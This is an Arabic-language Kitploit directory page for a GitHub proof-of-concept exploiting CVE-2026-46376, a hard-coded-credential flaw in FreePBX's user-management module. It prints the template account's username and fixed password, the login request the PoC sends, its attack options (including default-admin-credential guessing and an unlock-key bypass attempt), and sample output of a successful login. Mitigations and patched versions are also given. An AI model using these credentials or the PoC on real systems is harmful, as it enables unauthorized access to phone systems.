Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-46376 — CVE-2026-46376 - FreePBX وصول غير مصدق إلى UCP عبر بيانات اعتماد مثبتة بشكل ثابت | Kitploit
أدوات/GitHubGitHub/portbuster1337/cve-2026-46376
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالأوراق والأبحاثالتعلم والتعليم
GitHubportbuster1337/cve-2026-46376

CVE-2026-46376

CVE-2026-46376 - FreePBX وصول غير مصدق إلى UCP عبر بيانات اعتماد مثبتة بشكل ثابت

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-46376 — وصول غير مصادق عليه إلى UCP في FreePBX عبر بيانات اعتماد ثابتة

ثغرة أمنية خطيرة في وحدة إدارة المستخدمين (userman) في FreePBX تسمح للمهاجمين غير المصادق عليهم بالوصول إلى لوحة تحكم المستخدم (UCP) باستخدام بيانات اعتماد ثابتة يتم تضمينها أثناء عملية إعداد القالب العام لـ UCP.

CVSS v4.0: 9.1 (حرجة) | CWE-798: استخدام بيانات اعتماد ثابتة

تاريخ الإفصاح: 15 مايو 2026 | المبلغ: s0nnyWT

التفاصيل

عندما يستخدم المسؤول ميزة إعداد القالب العام الاختياري لـ UCP (التي تم تقديمها في 2021)، يتم إنشاء مستخدم نظام FreePBXUCPTemplateCreator بكلمة مرور ثابتة ومجمدة في الشيفرة. إذا لم يغير المسؤول كلمة المرور هذه بعد الإعداد، يمكن لأي مستخدم غير مصادق عليه على الشبكة تسجيل الدخول إلى UCP باستخدام هذه البيانات.

الحقلالقيمة
اسم المستخدمFreePBXUCPTemplateCreator
كلمة المرور1a2b3c@fd48jshs03123ld
المصدرUserman.class.php — يتم تمرير كلمة المرور عبر md5()
ناقل الهجومالشبكة
التعقيدمنخفض
مطلوب مصادقةلا
تفاعل المستخدملا
الشرط المسبقيجب أن يكون المسؤول قد قام بتشغيل إعداد القالب العام لـ UCP

ملاحظة: يتم إنشاء مستخدم FreePBXUCPTemplateCreator فقط إذا قام المسؤول بتشغيل ميزة إعداد القالب العام لـ UCP صراحةً. الأنظمة التي لم يتم فيها هذا الإعداد ليست قابلة للاستغلال عبر هذا CVE، حتى إذا كانت تعمل بإصدار متأثر.

الإصدارات المتأثرة

يقوم الإصلاح بإنشاء كلمة مرور عشوائية باستخدام bin2hex(random_bytes(24)) أثناء التثبيت/الترقية، ويتم إعادة إنشاء كلمة مرور منشئي القوالب الحاليين عند الترقية.

استخدام PoC

root@kitploit:~
pip3 install requests
python3 poc.py <target_url>

الخيارات

root@kitploit:~
الوسائط الموضعية:
  target              URL الهدف (مثال: http://192.168.1.100)

الوسائط الاختيارية:
  -h, --help          عرض رسالة المساعدة هذه والخروج
  --no-check          تخطي الفحص المسبق للإصدار
  --timeout TIMEOUT   مهلة الطلب بالثواني (الافتراضي: 15)
  --method {creds,unlock,admin,all}
                      طريقة الاستغلال التي سيتم تشغيلها (الافتراضي: all)
  -y, --yes           المتابعة تلقائيًا حتى إذا كان الإصدار خارج النطاق

الطرق

  1. creds — تسجيل الدخول إلى UCP عبر POST /ucp/ajax.php مع module=User&command=login باستخدام بيانات الاعتماد الثابتة
  2. unlock — محاولة تجاوز مفتاح فتح القفل عبر معلمات الاستعلام ?unlockkey=&templateid=
  3. admin — محاولة استخدام بيانات اعتماد المسؤول الافتراضية الشائعة على ACP

مثال

root@kitploit:~
$ python3 poc.py http://192.168.1.100

============================================
  CVE-2026-46376 PoC - FreePBX UCP Access
  Target: http://192.168.1.100
============================================

[+] Target is reachable (HTTP 200)
[+] FreePBX version: 16.0.30
[+] Version 16.0.30 is in the affected range
[+] UCP interface is accessible

============================================
  Exploitation
============================================

============================================
  Method 1: Hard-Coded UCP Credentials
============================================
    Username: FreePBXUCPTemplateCreator
    Password: 1a2b3c@fd48jshs03123ld
[+] Got CSRF token: a749bea059fa66bd32087a8481a4d07b
[+] SUCCESS! Logged in as FreePBXUCPTemplateCreator

============================================
  Summary
============================================
Target is VULNERABLE

الكشف

للتحقق مما إذا كان النظام قابلاً للاستغلال، يرسل PoC طلب تسجيل دخول إلى POST /ucp/ajax.php مع module=User&command=login وبيانات الاعتماد. يشير الرد {"status":true} إلى أن مستخدم منشئ القالب موجود وأن كلمة المرور لا تزال افتراضية.

الرد {"status":false,"message":"Invalid Login Credentials"} يعني إما:

  • المستخدم غير موجود (لم يتم تشغيل إعداد القالب مطلقًا)، أو
  • تم بالفعل تغيير كلمة المرور.

التخفيف

  • تحديث وحدة userman إلى 16.0.45 (FreePBX 16) أو 17.0.7 (FreePBX 17)
  • التحقق من أي بيانات اعتماد قالب UCP موجودة وتغييرها — التصحيح لا يغير كلمات المرور المنشورة بالفعل بأثر رجعي
  • تقييد الوصول إلى ACP/UCP على الشبكات الموثوقة باستخدام وحدة جدار الحماية FreePBX
  • تمكين MFA أو SAML لطبقات مصادقة إضافية
  • تدقيق جلسات UCP النشطة بحثًا عن عمليات تسجيل دخول غير مصرح بها

إخلاء مسؤولية

يتم تقديم هذا PoC لأغراض تعليمية واختبار أمني مصرح به فقط. الاستخدام غير المصرح به لهذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.

المراجع

  • GHSA-m55x-h47x-v3gx
  • NVD - CVE-2026-46376
  • FreePBX userman commit (introduced)
تنزيل الأداة
المنصةوحدة usermanالمتأثرالمصحح
FreePBX 15—15.0.42+لا ينطبق
FreePBX 16userman≤ 16.0.4416.0.45
FreePBX 17userman≤ 17.0.617.0.7